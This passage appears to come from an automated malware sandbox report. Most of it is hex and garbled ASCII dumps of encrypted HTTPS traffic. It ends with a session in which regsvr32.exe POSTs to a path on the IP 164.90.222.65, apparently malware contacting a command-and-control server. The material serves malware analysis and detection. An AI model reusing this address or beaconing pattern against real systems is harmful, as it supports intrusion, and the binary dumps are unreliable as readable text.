3d 2b ff 40 0b 61 a3 70 5a fb 48 45 37 c5 26 08 da 77 2d 42 aa 04 42 95 f2 22 09 3d f3 39 56 0c 6a 30 aa 04
                                                                                                                                                                                                                  Data Ascii: /6>+9[\vqwx*o. 5zO!,mK.?+'atqyy{0!7$bk$|}S&Z\C.}r4[A$2AP9,W!S &E{Nr3<P,E&QEKRi%pRs]sa!cAqxt5va@4Biar\Vkez3=iq4$oDID=+@apZHE7&w-BB"=9Vj0
                                                                                                                                                                                                                  2023-03-20 10:41:11 UTC173INData Raw: 78 d0 79 a3 f1 44 9a 4c b5 3d f8 44 00 5c 16 a3 70 25 1b 48 45 37 c5 1e 77 3b ae 54 4b ea 1c 3d 49 82 58 2b 7b b9 51 06 3e e9 45 7e 25 8d 3b 48 f4 27 d4 51 d2 64 35 fb 26 99 72 3b 64 56 e9 0e da 35 be 5e ce ad e4 ae a8 f5 04 c7 af d8 22 fe f7 64 96 0b c5 48 33 e3 26 c7 3e 7b 23 5a d2 53 82 2d 10 4c 08 e0 20 fe b6 6f 55 02 09 c8 70 9b 39 f1 78 7d 64 e3 75 9e d8 06 10 18 b8 27 34 89 25 40 7d f1 16 e5 cc 73 60 13 a3 2e be b0 7b 0f 49 e9 04 88 bc 30 55 48 b7 1c cb e1 74 05 79 c9 71 9f b8 37 a4 4c ea 21 d2 f3 17 02 65 df 76 37 29 6b a2 7c 60 ac cb 62 41 fd 8a 41 71 78 bd 1c 63 62 d0 21 51 c9 fc c9 46 3d fa 9a 60 64 be 3f 0c 1d 8d 8f 42 b5 28 6b 6a 7d cf c2 60 9e be bc f2 31 ce 44 4c 59 3c a9 5d 9e 54 c3 41 f7 27 6c 57 f6 e0 21 8a 55 08 26 45 b6 31 ec 78 3f 58
                                                                                                                                                                                                                  Data Ascii: xyDL=D\p%HE7w;TK=IX+{Q>E~%;H'Qd5&r;dV5^"dH3&>{#ZS-L oUp9x}du'4%@}s`.{I0UHtyq7L!ev7)k|`bAAqxcb!QF=`d?B(kj}`1DLY<]TA'lW!U&E1x?X
                                                                                                                                                                                                                  2023-03-20 10:41:11 UTC181INData Raw: e5 34 44 53 b6 7e 62 6d be ae d1 61 41 43 40 6a 8e 87 bd ec 9c 6b 30 21 a3 b7 cc 90 b2 d7 cb 03 61 64 51 b5 a1 aa 82 b2 fc 50 28 6b 6f 4d 3f 2b f0 d7 f9 40 35 74 ce a6 ea 90 fd c5 88 22 51 42 3b c9 86 da 68 00 61 0f 8c 78 53 e1 c0 9f 47 53 28 59 6f 39 3f ea d4 ca 42 43 35 7c f0 fd 94 5a 3c 68 91 69 ae bd f5 ed 9b 61 6b 00 67 e5 80 d2 50 26 45 16 86 07 2a ac e0 89 3c 2b 71 08 38 43 35 1f f4 c8 3f 59 3c 2b b9 a4 e1 41 34 48 b2 d7 db 03 61 64 23 10 30 a7 c4 82 f4 50 28 6b 31 82 4b aa fa e7 f1 40 35 74 35 f3 b9 f1 3f 68 30 aa c4 fa 37 48 33 e9 e6 a0 62 64 35 f3 17 02 65 df 20 9a d7 94 dd 31 c4 2b 71 5f 02 a5 35 74 7e fc 93 a5 c3 97 d9 e7 aa bd cb 84 ff ae 23 89 3d 40 3d 2f 1b ad a9 7f c7 bf 18 26 ee e0 7a a0 a1 8a d1 a3 35 74 b6 3d cc 06 e8 68 30 e6 14 b6 a8
                                                                                                                                                                                                                  Data Ascii: 4DS~bmaAC@jk0!adQP(koM?+@5t"QB;haxSGS(Yo9?BC5|Z<hiakgP&E*<+q8C5?Y<+A4Had#0P(k1K@5t5?h07H3bd5e 1+q_5t~#=@=/&z5t=h0
                                                                                                                                                                                                                  2023-03-20 10:41:11 UTC188INData Raw: 3c e9 75 39 49 6c cb b7 b2 17 73 e2 1f 4e 57 f1 16 3e cc 72 a8 94 6d 73 45 7a 3f 2b f0 27 59 25 1e 74 71 f9 49 41 f3 ed f1 dd da 07 2c c1 76 8a ac 45 81 25 02 7a 53 9e f0 b6 0a 48 a9 2e 85 e6 5d d4 8e e3 34 a3 1f ee 8e 87 fb 1c 24 2f c6 21 51 c3 41 50 78 ae 98 79 a0 09 2d 76 d2 63 5d be 70 53 28 e0 28 21 c8 ca b0 88 42 ca 60 6c f0 0d 24 e2 8e ed 9f e6 14 a6 9f f2 33 62 00 45 85 1e bc 3f b7 9e 18 76 08 fd a9 1e 81 cc ab 71 71 a5 04 63 dd 0e 71 78 bd 1c 1c 95 c1 21 51 83 51 68 30 e3 1e 20 f0 86 37 7a 94 63 55 cf b7 53 28 aa 08 29 34 aa 34 72 5f 96 35 74 b0 1d 2c 5f b7 25 20 d6 b0 83 de 4d 8a 61 6b 00 61 ed 60 6a d2 53 55 ba 1a 5f 28 ac 20 11 d0 ab 71 62 2a 06 1d 49 f8 3d 14 d8 49 40 4e e3 49 42 bf 0d 1b eb 2f 24 59 ef 70 62 da 62 61 07 cf 16 c8 2f ee 74 2f
                                                                                                                                                                                                                  Data Ascii: <u9IlsNW>rmsEz?+'Y%tqIA,vE%zSH.]4$/!QAPxy-vc]pS((!B`l$3bE?vqqcqx!QQh0 7zcUS()44r_5t,_% Maka`jSU_( qb*I=I@NIB/$Ypbba/t/
                                                                                                                                                                                                                  2023-03-20 10:41:11 UTC196INData Raw: cf 1e df 9c 84 12 f5 fa 98 61 8b 82 dc 72 f8 35 cb d8 79 9f b5 e9 51 42 b5 3d c4 e2 11 39 61 ef 70 8d d8 63 be bc 11 64 c0 78 cd 39 3f 63 f8 27 6e 0b b0 b4 7e fc 46 5b 3c 68 88 15 4b 42 34 a1 a6 9e 94 ff a6 21 2a f5 27 26 45 f6 29 4c 2b ea 10 26 ae 25 71 62 86 06 3a 5c 7e 78 3c 32 79 67 4f a8 14 4d 8c cd 23 20 63 81 24 6b 1e c2 ac d9 c4 42 4b 8e 5c c7 ec f8 52 24 79 e3 34 4c 7d df f8 78 fb 1c 37 fb 62 21 51 c9 79 43 c4 83 40 ca b0 8d 36 b0 92 cf 40 be 09 58 a9 2e 6e 9a c7 2b 71 e3 04 48 14 f8 71 78 bd 1c 37 ff 48 de ae c3 41 43 59 ec 6a 00 a6 21 ca c5 d6 26 45 b6 01 ac 50 2e 9a c6 be 6e 8e 61 09 bc ca 1f 34 87 5a d0 79 97 b1 54 ae d5 48 e9 cc a5 2e 17 13 ec 35 7a 92 4b 52 34 85 3e 3f 6c e4 4c 28 9e 17 68 41 84 70 6f d5 ac 3c 59 b7 2d 2b 22 91 cb 71 53 8b
                                                                                                                                                                                                                  Data Ascii: ar5yQB=9apcdx9?c'n~F[<hKB4!*'&E)L+&%qb:\~x<2ygOM# c$kBK\R$y4L}x7b!QyC@6@X.n+qHqx7HACYj!&EP.na4ZyTH.5zKR4>?lL(hApo<Y-+"qS
                                                                                                                                                                                                                  2023-03-20 10:41:11 UTC204INData Raw: 77 51 4e c3 71 47 f8 56 6b 00 a0 01 3a 74 d2 53 4a 97 22 04 e9 ac 20 ce 15 a3 71 62 80 2e c2 72 b0 1d cb 57 bd 1d c7 e0 29 b7 36 c3 7e 95 9c e1 4a ae e4 93 50 ec 0d bc 97 92 c1 6e ec 74 c8 aa 04 95 a8 60 38 74 b6 3d d3 fd 9c 68 30 4a 14 ad 5f c1 76 8d ea 45 8e 02 02 85 ac e7 28 d8 47 d2 5d 84 7e 3a 31 2b fa 27 ae ca 71 50 31 f3 79 ae 78 e3 75 2e da 0f 33 c1 77 46 53 48 ea 62 7d f3 17 02 75 76 cf 52 a1 2f 41 19 d7 1e 1a 62 41 07 be 84 34 fd c3 56 b8 93 32 21 51 85 71 4f 55 0d 6b 00 d9 af 5e 52 fc a7 00 30 a3 a0 28 6b e4 4c 38 66 12 63 40 c8 78 73 f8 35 13 9e 79 97 a0 7f 51 42 bf 05 cc 95 8a 2b ab b5 dc 79 99 e7 ac 33 cd 1e d7 aa 00 c6 32 aa 04 9d 09 f5 ae 74 b6 3d d3 94 f7 68 30 4a 14 ad 27 c1 76 8d 00 45 8e 63 bc 3f bc e7 20 d8 46 d2 5d 84 18 25 91 2a fa
                                                                                                                                                                                                                  Data Ascii: wQNqGVk:tSJ" qb.rW)6~JPnt`8t=h0J_vE(G]~:1+'qP1yxu.3wFSHb}uvR/AbA4V2!QqOUk^R0(kL8fc@xs5yQB+y32t=h0J'vEc? F]%*
                                                                                                                                                                                                                  2023-03-20 10:41:11 UTC212INData Raw: 0c 73 64 39 3f a0 f5 46 49 42 35 74 99 03 52 a6 c3 20 b9 24 15 3b 35 48 7b eb 07 24 29 2c bc 26 77 66 0d b4 20 77 10 6b 2d ba 5b 0f 41 62 c2 27 11 5c 71 fb 58 7d 1c 68 75 12 98 07 07 88 7b e9 bd 48 ea ab ca aa 1f ab d9 13 e4 53 28 6b 2c b2 64 3b 38 e9 2a 5b 7c ff 02 58 75 d2 df 37 f3 ed 19 cb 68 6c 3b 2a e2 74 45 74 62 32 d0 ca 15 bc c0 77 a8 6b 65 39 77 a0 c5 46 c9 43 35 74 39 f3 c6 11 b5 1c 14 09 d8 06 10 68 db 97 08 00 61 2c be 26 77 1e 76 fe fc ff 65 6b 65 71 b6 67 55 26 c8 0f 11 38 b6 3c 18 19 4a e7 30 21 6c 0b 36 48 33 6d ef cb 61 64 35 47 ff 6b 45 37 30 15 15 5d 09 39 3f 24 f5 81 41 43 35 49 01 d0 3c 59 48 4d 0d ce a8 42 34 47 b6 a7 6b 00 61 2c be ac 1b ad 8e df 72 57 28 6b e0 f9 30 ae 6c 63 41 43 8d 04 d9 78 3c b2 8b 20 bb ea b9 25 d3 b7 cc da 5d
                                                                                                                                                                                                                  Data Ascii: sd9?FIB5tR $;5H{$),&wf wk-[Ab'\qX}hu{HS(k,d;8*[|Xu7hl;*tEtb2wke9wFC5t9ha,&wvekeqgU&8<J0!l6H3mad5GkE70]9?$AC5I<YHMB4Gka,rW(k0lcACx< %]
                                                                                                                                                                                                                  2023-03-20 10:41:11 UTC220INData Raw: 51 aa 16 a4 cd 9d 23 83 a5 34 68 b9 da 72 61 27 cd 1f 0c 63 30 6a 77 a0 9d 2a c2 af 7d b3 34 90 09 42 3c 68 03 fa 62 8b f3 0d df ff c8 00 61 dc 3b e7 53 26 cc 7a b0 94 6d 9b be b9 3f 2b 4c db 1b 43 35 7b f5 cd 3d 59 3c 55 3e bc 51 42 3b cc 98 62 6b 00 5c 46 fb 7a 53 29 c0 6b 46 53 28 ac 20 11 77 a2 71 62 f9 ca bd fc f9 f3 71 71 cb 89 f1 cb 57 cb 61 60 b2 27 43 a3 b8 9b ca fb 26 0e 59 ef be ac ef 2e 7d 1c 12 2b 71 b3 2c 5b b4 01 69 2a e3 cc 5d e9 45 39 09 a4 ab 29 f4 27 4b e6 28 64 35 fb 16 06 3c 0d bb ac a9 2e 45 e0 a1 2b 71 a3 24 63 31 f5 04 58 c1 b2 31 68 f7 64 61 13 f3 48 33 a3 0e 30 6f e5 40 4a 08 2c 90 06 cf 16 18 2f ee 74 1f a0 24 7a ca 0e 1d 38 fa 7d 5e 0c 3d 68 b9 65 75 62 dc a1 07 62 6b 8b b9 e1 f5 75 d6 f7 44 37 44 eb 91 31 65 39 d6 14 8e 9d be
                                                                                                                                                                                                                  Data Ascii: Q#4hra'c0jw*}4B<hba;S&zm?+LC5{=Y<U>QB;bk\FzS)kFS( wqbqqWa`'C&Y.}+q,[i*]E9)'K(d5<.E+q$c1X1hdaH30o@J,/t$z8}^=heubbkuD7D1e9
                                                                                                                                                                                                                  2023-03-20 10:41:11 UTC228INData Raw: c7 d9 be 5e aa 1f bd 2e 30 f5 04 a3 a0 ce fd 8d f7 64 96 b4 f4 48 33 a3 06 c7 66 a5 50 bd 5e a7 00 f0 88 51 d7 94 e4 4c f8 e0 93 47 41 84 70 97 b5 9b 3c 59 bd 2d d3 8b 0b 42 34 89 5e 81 62 81 14 87 ba 5d 53 26 82 72 8b f6 6e 6b 65 b2 72 e4 86 83 f9 7c f0 51 32 a9 d6 d0 69 a7 bb 6c 9e b5 d5 89 d9 66 e2 55 ae e5 40 b5 47 01 45 37 83 16 f7 f3 7e 39 3f 40 34 bd 10 ca 70 ab c9 cb f3 78 09 e3 7d fe a6 a3 8c 87 f8 40 55 2b ab b5 dc 79 99 e7 ac 32 cd 1e f7 ea 20 e6 93 d2 8e 9d c0 06 ea c8 d4 87 c3 d8 49 b7 b3 cf ae bd f3 0d d4 63 c6 00 61 ef 78 9d a4 c7 6e fd 95 ba 2b a1 a4 d0 39 a2 3c 85 c0 36 d2 c9 57 78 3c d2 79 8b b9 65 75 0a bf 0d d4 2f e0 c7 e8 20 11 3a d8 63 82 be 00 77 10 e0 20 e2 b6 6f 55 52 ca 06 fe fd 35 5c 14 d2 79 b7 74 aa 1c 95 bf 1d e0 e9 26 cf e8
                                                                                                                                                                                                                  Data Ascii: ^.0dH3fP^QLGAp<Y-B4^b]S&rnker|Q2ilfU@GE7~9?@4px}@U+y2 Icaxn+9<6Wx<yeu/ :cw oUR5\yt&
                                                                                                                                                                                                                  2023-03-20 10:41:11 UTC235INData Raw: bf 04 17 5a e0 44 45 24 06 b2 eb db 85 38 b8 12 a1 63 a2 7d 1b 1b 3a 8e 41 43 b4 30 55 48 a9 32 c3 97 e1 45 75 72 bf 04 17 52 9c e1 a0 8e 33 f3 07 02 75 b6 30 77 18 43 19 39 3f a0 35 46 71 ca 71 50 41 f3 70 7d 74 e3 34 05 62 8a 75 c1 7b 66 ac 44 45 54 66 07 53 26 c4 7b 60 63 cc a5 19 99 be 5f 55 52 2a c2 49 d4 fa 3c 18 69 b5 2c 14 11 19 c1 f0 60 f0 ae a7 cc 29 ed 69 5e 5b 6e cc 43 60 43 7d 3c 24 6f 77 a6 1d 46 f8 0b b4 98 b1 78 3c 59 75 e3 c0 c9 7b 44 34 48 7b e9 36 7f ea 19 4a 49 9a e1 00 f0 fe 5a 28 6b ec 74 f0 93 c1 40 41 43 f2 31 ba a4 99 59 3c 29 8e 4d 21 42 34 75 83 40 6b 00 6e e0 b8 78 53 26 78 98 76 53 28 64 e1 58 3d 2b 71 5f 78 76 35 74 7e fc 7e 5b 3c 68 0d f0 0d 42 34 47 b7 be 6a 00 61 25 0e bc 5c a2 75 36 44 53 15 c8 1e 39 3f 24 f5 68 40 43 35
                                                                                                                                                                                                                  Data Ascii: ZDE$8c}:AC0UH2EurR3u0wC9?5FqqPAp}t4bu{fDETfS&{`c_UR*I<i,`)i^[nC`C}<$owFx<Yu{D4H{6JIZ(kt@AC1Y<)M!B4u@knxS&xvS(dX=+q_xv5t~~[<hB4Gja%\u6DS9?$h@C5
                                                                                                                                                                                                                  2023-03-20 10:41:11 UTC243INData Raw: b6 6f 55 52 ca 06 22 30 fa 3d 4b d0 78 4c 18 c9 49 f1 cb b7 f4 27 04 27 fc 64 35 f1 1e 49 b2 ef fc e6 a9 25 7e 22 e4 aa 92 36 ff bc ca f5 b2 62 b4 59 3c 9f d1 e0 bb 41 bd 1d 5c e9 26 6f d9 b9 72 0a 4c 6b ce f9 b3 b2 03 a1 dd 74 ae e4 cb b3 a8 40 ff b5 98 7d b5 14 53 e9 45 4e 7e ca 43 ee b2 17 04 97 e2 10 93 bd 16 41 d8 e2 44 53 a3 26 02 ce de 00 bb b3 a8 40 ff b5 98 7e b5 14 5b a9 5d 46 58 c3 79 2f 24 45 6c 2a e0 11 52 63 80 2b 6f f0 01 2c 78 b3 65 39 be 6e 0e 44 cd bc ca f5 04 07 74 3a 35 68 f7 64 26 5d 51 48 33 e3 26 77 2f ae 86 41 92 43 32 27 c5 26 5f 7c 4a 6e d0 a0 34 15 05 c8 70 0b fa 2d 5b d2 71 07 b9 65 75 62 dc 1b fc 9c 94 eb 64 df 16 b5 53 26 c4 cc 2a 15 28 6b 11 59 d6 c0 8a 9d be 84 70 1b 3d 1f 3c 59 84 e1 b8 a9 d9 83 59 27 3e a3 06 6f 6f e5 40
                                                                                                                                                                                                                  Data Ascii: oUR"0=KxLI''d5I%~"6bY<A\&orLkt@}SEN~CADS&@~[]FXy/$El*Rc+o,xe9nDt:5hd&]QH3&w/AC2'&_|Jn4p-[qeubdS&*(kYp=<YY'>oo@
                                                                                                                                                                                                                  2023-03-20 10:41:11 UTC251INData Raw: 33 e3 1e 20 c7 c9 69 e9 d8 6b 65 c0 a5 ea 2b 6b 65 39 fe c1 75 eb 14 63 b4 39 51 33 7b 0b 5d e9 45 01 be a9 c1 29 f4 27 7b 84 60 64 35 f1 16 36 84 d7 42 da 6d 7b e4 7c 2f cf d8 9d be 82 50 64 78 f9 49 49 04 8a 2f 21 da 07 24 c1 77 46 53 8b 24 4c bc 3e 77 16 ce 72 5c 17 a3 26 45 7d b4 6e 91 e9 14 a7 bc 30 55 50 74 d4 79 80 78 a8 15 66 14 a0 81 0c 95 ff 29 e7 f1 1a 0e e5 0d bc 80 1b a1 33 6d 71 b6 5b 61 2a c8 3b 2d 38 f8 08 1c 0c 74 e5 58 98 19 c3 d8 88 33 62 6b 8b 24 13 7d f1 2e 59 0c bc b5 1b a1 17 41 09 b6 6f 55 4a ca 06 5a fd 35 5c 1c 14 b7 98 d8 a6 96 bd cb 7b e8 51 ab c7 24 6b 3f 02 53 26 0d be 01 40 90 4a e4 39 3f 16 f2 55 41 43 3a f0 ab 78 3c 59 01 49 b1 21 51 4d b0 8d 33 62 6b 3d c6 b9 35 7a 5c a3 6f 35 44 53 ef 2e 9e 4c 9a 2b 71 da 2a 0f 91 73 fa
                                                                                                                                                                                                                  Data Ascii: 3 ike+ke9uc9Q3{]E)'{`d56Bm{|/PdxII/!$wFS$L>wr\&E}n0UPtyxf)3mq[a*;-8tX3bk$}.YAoUJZ5\{Q$k?S&@J9?UAC:x<YI!QM3bk=5z\o5DS.L+q*s
                                                                                                                                                                                                                  2023-03-20 10:41:11 UTC259INData Raw: 14 e6 47 c2 70 f0 43 c5 c3 a6 bd 1d b4 3f 60 a7 53 8f b6 7a 6d 00 61 36 bf 7a 53 a7 c8 2f 42 53 28 a3 07 d0 a7 a0 fc 7a 47 43 35 83 90 b9 d6 5d b5 fd 28 27 51 42 75 c3 e2 e3 ee 18 67 64 35 39 2e d9 ba f6 e1 4b 2e 6b 65 3a be 9e 69 64 41 43 82 e7 ec 4f fb dc 14 6e 30 21 5e 21 34 48 b2 e7 43 06 61 64 5d 17 53 26 c4 82 6c 55 28 6b 92 86 5a 33 b0 cf 69 45 35 74 7e f9 89 71 3a 68 30 b8 79 4d 34 8f 76 ee 34 9c 61 64 b4 0f df 14 e4 f2 62 d2 5d e7 7b 4c f2 0d b6 e7 51 45 35 74 c0 aa 3c 59 ed c5 20 27 51 42 f5 e5 23 64 6b 00 66 0f b0 6a 55 26 45 2a cd d6 38 6d 65 39 be ae 61 64 41 43 8b 3f 8e 87 bd ec 2c 6e 30 21 99 9c c8 b7 f4 27 fb 61 cd 64 35 fb 1e b6 d5 b3 53 ba a9 1e f5 11 9f 31 98 e9 cc 63 33 74 71 f3 79 d1 b5 2c 14 51 da 07 b4 cb fa 63 e2 44 45 04 be 3f c3
                                                                                                                                                                                                                  Data Ascii: GpC?`Szma6zS/BS(zGC5]('QBugd59.K.ke:idACOn0!^!4HCad]S&lU(kZ3iE5t~q:h0yM4v4adb]{LQE5t<Y 'QB#dkfjU&E*8me9adAC?,n0!'ad5S1c3tqy,QcDE?
                                                                                                                                                                                                                  2023-03-20 10:41:11 UTC267INData Raw: 21 04 a6 20 11 5a 7e 33 45 37 c5 17 0c 4b 92 07 3f 2b b0 0e 65 63 25 f5 05 5c 1c b4 fa 69 30 aa 15 66 14 c1 77 46 4b 48 e2 a0 2d b9 1f ad 99 7e cd 08 20 22 ec 52 2f 62 f8 11 59 14 7d f7 9d 18 b7 dd 18 c8 30 21 51 0a bf e4 17 fa 6b 00 61 25 be a3 da 62 61 07 cf d7 0c fb 65 39 3f 62 f8 09 81 02 be 8c 39 f3 ce d0 78 4c 10 c9 05 cb cb b7 00 a2 ac 44 45 2c 94 f7 53 26 0d be 00 77 64 23 ee 3c 69 b4 71 62 09 c6 f5 01 2e bf 78 7d 7c c4 c9 21 51 fb ee ba 71 21 2a b9 71 09 b6 0e d2 6a 61 77 bb 2c 53 f4 e4 4d 1b 6b 80 a5 ec 2b b4 00 55 38 0f 60 e2 9f f7 65 75 06 e6 2c 33 62 ea 44 45 20 51 7d ac d9 c4 73 60 17 b0 fe 9a c6 be 5f 55 26 7e 88 cc 8b fa 3c 18 1d b7 2c 14 61 b9 ab a6 b6 cc 2a e2 05 93 fa 35 7a 17 ad 8a 73 cf 90 60 e0 b0 71 b4 e5 3d ef 1d 67 55 3d fa 23 2c
                                                                                                                                                                                                                  Data Ascii: ! Z~3E7K?+ec%\i0fwFKH-~ "R/bY}0!Qka%bae9?b9xLDE,S&wd#<iqb.x}|!Qq!*qjaw,SMk+U8`eu,3bDE Q}s`_U&~<,a*5zs`q=gU=#,
                                                                                                                                                                                                                  2023-03-20 10:41:11 UTC274INData Raw: 05 67 61 ed 37 78 3c 98 58 4c 64 25 90 26 10 1c 31 e3 1f 24 35 db ba 64 53 ad 01 13 10 d8 6c 4f 35 d1 59 5f 8f 9d 09 ca 30 eb f1 78 3c 1c b7 a6 74 aa 96 c9 e2 00 b8 a9 e2 ac 45 c4 35 7a 53 6a c8 6b 60 23 61 e0 3e 29 76 a0 1a 7a 08 c8 46 54 38 f3 47 71 75 e3 d3 60 0f 0a cb a8 7f e9 b7 49 e8 3f 2d 33 da 55 65 7e cd 00 38 22 ec 72 37 7c 39 e1 ad 23 be f0 55 b8 3c 59 3c e3 8c 05 99 42 34 48 7b ef 5e b7 f9 9b ca f3 2f 02 1d be 00 77 78 e0 e1 1d 97 2b 71 62 08 ca 46 94 38 fb 5f 81 3c e1 74 05 69 c9 b0 6c 93 62 6b 00 52 b6 06 b3 da 62 61 07 cf d7 0c f3 65 39 3f 62 fa bb c8 07 11 5c fa fc 18 c9 3c 68 30 a8 15 66 14 a0 81 0b 94 ff 29 ef 30 81 2c 26 45 f0 00 77 50 a1 13 39 3f 63 f4 a2 34 15 f2 30 55 08 4a 8a 3c 68 5b 65 75 32 3f f1 d9 8a e8 aa 20 dd 6e 24 cf 34 cc
                                                                                                                                                                                                                  Data Ascii: ga7x<XLd%&1$5dSlO5Y_0x<tE5zSjk`#a>)vzFT8Gqu`I?-3Ue~8"r7|9#U<Y<B4H{^/wx+qbF8_<tilbkRbae9?b\<h0f)0,&EwP9?c40UJ<h[eu2? n$4
                                                                                                                                                                                                                  2023-03-20 10:41:11 UTC282INData Raw: e5 40 f5 7a 53 26 ce 73 60 23 c0 56 30 c7 c0 63 f8 67 df 22 35 74 b6 fc 18 b9 3c 68 30 31 51 42 34 04 b8 a9 27 8b a6 2c be ac 1a ad 8b be e8 77 f0 6b 65 39 7b a2 cd 46 91 43 35 74 3d f5 a0 7d ac 68 30 21 18 c9 6f 68 7a e9 00 28 28 ef 46 42 1a ad a6 76 1b 12 76 34 2d c6 df e7 f8 2e 65 4b 60 3c fa 94 74 da d0 08 f7 64 49 86 53 48 33 a5 2e 1c 92 f6 35 7a 94 63 55 8d dd 53 28 ea 28 29 1c 9f 8f 2d c0 36 25 f1 22 24 6e d8 79 78 af be 51 42 b5 3d 23 51 10 c9 92 ef 70 6a da 63 b9 f0 01 43 b1 ee 65 39 fe 46 61 6a 80 26 25 72 f0 0d 2c f8 ac f3 e3 a0 24 52 1c fe f2 4f ea 75 71 c2 63 de 9b ad 00 27 cd 16 d0 ac 20 29 aa 19 71 62 c0 0e 25 5e 7a f6 93 d2 71 78 88 28 9a 7f b9 bf d2 a3 81 06 e8 31 25 fb 16 36 e9 1d 44 53 a9 1e 75 8e e1 17 4a e9 04 53 bc 31 81 bf 79 49 bb
                                                                                                                                                                                                                  Data Ascii: @zS&s`#V0cg"5t<h01QB4',wke9{FC5t=}h0!ohz((FBvv4-.eK`<tdISH3.5zcUS(()-6%"$nyxQB=#QpjcCe9Faj&%r,$ROuqc' )qb%^zqx(1%6DSuJS1yI
                                                                                                                                                                                                                  2023-03-20 10:41:11 UTC290INData Raw: 79 50 59 f3 78 7d 0c 5b f8 60 d8 4a f3 0c 17 42 72 96 61 64 f4 1e 77 06 46 f6 20 77 08 65 0e 7d 1b 0b 53 eb 05 67 15 b5 15 5c 1c 49 bd 1c 14 01 45 73 32 48 b8 26 4f 20 e8 20 11 5a d8 6a 61 0f cf 57 0c 58 ad 78 b6 63 75 a5 05 67 15 fb 42 78 3c d8 78 4c 10 09 8c bd cb c9 47 46 4b a3 40 62 35 f1 17 02 65 be 00 77 08 23 e6 fd 27 e8 bd ae c8 17 11 64 f8 34 18 51 69 3b 78 aa bd 0a b7 a4 0b da d5 b8 61 64 f2 3f 73 70 67 37 44 6e f3 ef 65 39 30 a4 ef 65 41 43 3a f0 29 7e 3c 59 01 de 34 21 51 4d b0 b5 37 62 6b 3d 2c 73 35 7a 5c a2 98 34 44 53 15 70 7e 39 3f 24 f5 a3 43 43 35 49 cb 49 3c 59 33 ec bd 20 51 42 09 50 65 62 6b 0f e4 03 3e 7a 53 e1 00 2f c5 d1 28 6b ee 74 27 93 74 23 51 47 c2 95 5a b2 ed b0 3f a2 f1 c8 54 cb 79 50 b2 17 73 6a 01 68 35 bd 16 06 88 8f 44
                                                                                                                                                                                                                  Data Ascii: yPYx}[`JBradwF we}Sg\IEs2H&O ZjaWXxcugBx<xLGFK@b5ew#'d4Qi;xad?spg7Dne90eAC:)~<Y4!QM7bk=,s5z\4DSp~9?$CC5II<Y3 QBPebk>zS/(kt't#QGZ?TyPsjh5D
                                                                                                                                                                                                                  2023-03-20 10:41:11 UTC298INData Raw: 65 6a d8 6a 61 67 b3 b2 03 a1 b4 d0 3c e1 b0 8b 47 ca 79 50 21 f9 70 7d 6c 70 8e 45 c2 c3 40 6c 63 3f 1c 62 f2 28 be 3f c4 ad 11 13 14 d8 65 e8 8d 1a 49 d5 8e da 2e 63 35 74 98 61 c5 a6 c3 af 75 a6 00 a3 34 48 8b 5b e5 e3 59 ef 78 fd a4 c7 fd 94 70 6d 1a aa 8f 3d b6 7e f6 a3 2c c4 3c f5 04 ff a7 12 38 68 f7 64 d2 ea e3 48 33 e3 26 83 4b e8 ad c6 d8 6b c6 c0 a5 78 e2 ba 8c 3a f5 ea 98 64 c8 0e b6 b5 14 fb 31 d8 49 eb 1d 66 7e 25 78 c3 76 cd e0 55 e2 ef 78 fd bb 9f 30 c9 bb eb 36 98 65 39 02 35 82 62 41 4c b0 dd 89 87 c3 15 b1 f4 14 d1 51 42 34 09 b8 a4 22 8b 3a 54 7c f1 20 1e 0c bc 3f 13 61 e0 86 78 60 6a 2f 23 1c 02 69 29 b2 b4 70 d2 e0 21 b9 7a 59 0b bd 23 2b 2b e2 73 41 33 7d f9 bf 66 ce 73 60 2b 60 e0 d1 1d bf 2b 71 62 09 c8 49 50 01 31 b5 2a d4 e1 74
                                                                                                                                                                                                                  Data Ascii: ejjag<GyP!p}lpE@lc?b(?eI.c5tau4H[Yxpm=~,<8hdH3&Kkx:d1If~%xvUx06e95bALQB4":T| ?ax`j/#i)p!zY#++sA3}fs`+`+qbIP1*t
                                                                                                                                                                                                                  2023-03-20 10:41:11 UTC306INData Raw: 19 dc 3e 59 78 70 31 21 70 5b 35 48 4f c6 69 00 45 7d 34 7a a7 39 44 37 cc f7 2a 6b 91 26 3e 2b ae 42 40 43 29 d4 73 78 dc 79 3d 68 46 03 50 42 78 ea 31 62 13 22 60 64 22 59 52 26 69 97 46 53 30 48 64 39 3c 0f 70 62 e9 e7 37 74 75 5c 3d 59 87 4c 31 21 e1 e6 36 48 8f 46 6a 00 a5 41 34 7a 03 86 47 37 80 76 29 6b f4 01 3e 2b cd c6 43 43 a1 4c 70 78 bb 60 3d 68 f8 85 53 42 bc 71 32 62 78 3b 60 64 ed de 51 26 51 0c 45 53 fa 57 64 39 fb 8b 73 62 95 7f 34 74 34 46 3d 59 70 ca 32 21 19 7c 35 48 fc 5d 6a 00 91 c0 37 7a 83 19 44 37 0d 15 29 6b 61 9c 3d 2b 3d 24 40 43 31 33 70 78 08 f9 3e 68 34 66 50 42 80 00 32 62 eb a3 63 64 81 32 52 26 ea 7e 45 53 34 cb 67 39 8f 62 70 62 cc 09 34 74 51 dd 3e 59 ac 22 31 21 71 0e 35 48 9b c3 69 00 41 28 34 7a 4d 6b 44 37 58 f3 2a
                                                                                                                                                                                                                  Data Ascii: >Yxp1!p[5HOiE}4z9D7*k&>+B@C)sxy=hFPBx1b"`d"YR&iFS0Hd9<pb7tu\=YL1!6HFjA4zG7v)k>+CCLpx`=hSBq2bx;`dQ&QESWd9sb4t4F=Yp2!|5H]j7zD7)ka=+=$@C13px>h4fPB2bcd2R&~ES4g9bpb4tQ>Y"1!q5HiA(4zMkD7X*
                                                                                                                                                                                                                  2023-03-20 10:41:11 UTC311INData Raw: 0d 0a
                                                                                                                                                                                                                  Data Ascii:
                                                                                                                                                                                                                  2023-03-20 10:41:11 UTC311INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                  3192.168.2.449707164.90.222.65443C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                  2023-03-20 10:42:42 UTC311OUTPOST /ncju/qfgtbvn/ HTTP/1.1
                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                  Host: 164.90.222.65
                                                                                                                                                                                                                  2023-03-20 10:42:42 UTC311INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                  Date: Mon, 20 Mar 2023 10:42:42 GMT
